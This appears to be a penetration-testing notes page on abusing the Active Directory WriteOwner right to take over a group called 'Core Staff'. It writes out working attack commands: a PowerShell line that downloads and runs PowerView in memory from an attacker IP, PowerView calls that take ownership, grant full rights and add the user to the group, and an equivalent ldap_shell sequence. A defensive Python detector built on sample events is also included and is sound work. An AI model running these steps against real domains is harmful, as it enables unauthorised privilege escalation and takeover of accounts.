# WriteOwner

Assume a user has `WriteOwner` on a group. We can take ownership of the group and then add ourselves, or any other user we have compromised, to it. We start by looking at the BloodHound graph.
In this example, the user `JDGODD` has `WriteOwner` on a group called `Core Staff`, so we can take control of the group using PowerView.


![WriteOwner Permission in Bloodhound](/files/xT7Z1UR3CIDqz8y0mMX4)

We start by importing PowerView. We can load it in memory using `IEX`.

```powershell
iex(new-object net.webclient).downloadstring('http://10.10.xx.xx/PowerView.ps1')
```

Then we take JDGODD's password and build a credential object, stored in a variable called `$Cred`.

```powershell
$SecPassword = ConvertTo-SecureString 'Password1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\JDgodd', $SecPassword)
```

Now we change the owner of the group (`OwnerIdentity`) to JDgodd and then grant that principal (`PrincipalIdentity`) all rights on it.

```powershell
Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Cred $cred
Add-DomainObjectAcl -TargetIdentity "CORE STAFF" -PrincipalIdentity JDgodd -Cred $cred -Rights All
```

Finally, we add the user to the group.

```powershell
Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Cred $cred
```

To verify, run `net group 'CORE STAFF'`.
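
Seen from the defender's side, the owner change, ACL grant and member add above show up as a short sequence of Security events on the domain controller. The following is an added example (not part of the original notes) that correlates them; it assumes auditing is configured so that event 5136 is logged for `nTSecurityDescriptor` changes on groups and 4728/4732/4756 for member additions, and it uses constructed sample events in which the group and user CN are assumed to match their account names.

```python
from datetime import datetime, timedelta

MEMBER_ADDED = {4728, 4732, 4756}  # member added to global / local / universal group
GROUP_DN = "CN=Core Staff,OU=Groups,DC=domain,DC=local"  # constructed DN

# Constructed sample events (not real logs), already flattened to dicts.
EVENTS = [
    {"id": 5136, "time": "2024-05-01T10:00:05", "SubjectUserName": "JDgodd",
     "ObjectDN": GROUP_DN, "ObjectClass": "group",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},   # owner change
    {"id": 5136, "time": "2024-05-01T10:00:40", "SubjectUserName": "JDgodd",
     "ObjectDN": GROUP_DN, "ObjectClass": "group",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},   # ACL grant
    {"id": 4728, "time": "2024-05-01T10:01:10", "SubjectUserName": "JDgodd",
     "TargetUserName": "Core Staff",
     "MemberName": "CN=JDgodd,CN=Users,DC=domain,DC=local"},
    # Benign: a member is added with no earlier descriptor change by that actor.
    {"id": 4728, "time": "2024-05-01T11:00:00", "SubjectUserName": "helpdesk1",
     "TargetUserName": "Core Staff",
     "MemberName": "CN=asmith,CN=Users,DC=domain,DC=local"},
]

def first_rdn(dn):
    """Value of the leading RDN, lowercased (simplified: no escaped commas)."""
    return dn.split(",", 1)[0].split("=", 1)[1].strip().lower()

def find_takeovers(events, window=timedelta(minutes=30)):
    """Flag member additions that follow a security-descriptor change on the
    same group by the same account within `window`."""
    sd_changes = {}  # (actor, group) -> time of latest descriptor change
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        actor = ev["SubjectUserName"].lower()
        if (ev["id"] == 5136 and ev.get("ObjectClass") == "group"
                and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
            sd_changes[(actor, first_rdn(ev["ObjectDN"]))] = ts
        elif ev["id"] in MEMBER_ADDED:
            group = ev["TargetUserName"].lower()
            changed = sd_changes.get((actor, group))
            if changed and ts - changed <= window:
                member = first_rdn(ev["MemberName"])
                alerts.append({"actor": actor, "group": group, "member": member,
                               "self_add": member == actor,
                               "seconds_after_sd_change": int((ts - changed).total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in find_takeovers(EVENTS):
        print(alert)
```
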

### Alternative Method

We can also do this over LDAP, using a tool called [ldap\_shell](https://github.com/PShlyundin/ldap_shell).

```bash
ldap_shell domain.local/JDgodd:Password1 -dc-ip 10.10.xx.xx
```

After getting an interactive session, we can execute two commands that give us the important rights. In the second command, `JDGODD` can be replaced with any other username.

```bash
set_genericall "CORE STAFF" "JDGODD"
add_user_to_group "JDGODD" "CORE STAFF"
```
